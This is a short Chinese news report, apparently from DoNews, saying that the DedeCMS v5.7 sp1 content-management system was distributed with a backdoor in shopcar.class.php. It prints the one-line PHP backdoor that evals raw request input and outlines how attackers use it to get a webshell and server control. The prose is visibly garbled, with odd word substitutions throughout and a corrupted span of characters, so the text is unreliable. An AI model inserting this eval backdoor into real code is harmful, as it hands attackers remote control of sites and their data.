DoNews 3月22日動靜 據動靜人士對DoNews透露,PHP開源網站打點系統織夢CMS(DedeCms)v5.7 sp1版本被植入后門,黑客可經由過程此后門直接獲得網站的節制權限,獲取存儲在處事器尚?罾υ?件和數據庫。
據悉,織夢CMS(Dedecms)v5.7 sp1版本的中的shopcar。class。php文件被植入一句后門代碼“@eval(file_get_contents(‘php://input’));”。經由過程操作該后門,黑客只需機關簡單的數據包提交各處事器,就能獲取到該網站的WebShell,經由過程對處事器進一步滲入抨擊襲擊,進而獲取處事器的最高權限。
織夢CMS裂痕示意圖
另據CMS官方數據顯示,今朝約有70萬網站使用該系統搭建,涉及企業、政府機關、媒體機構、行業及小我網站等。(完)
網友點評
精彩導讀
科技快報
品牌展示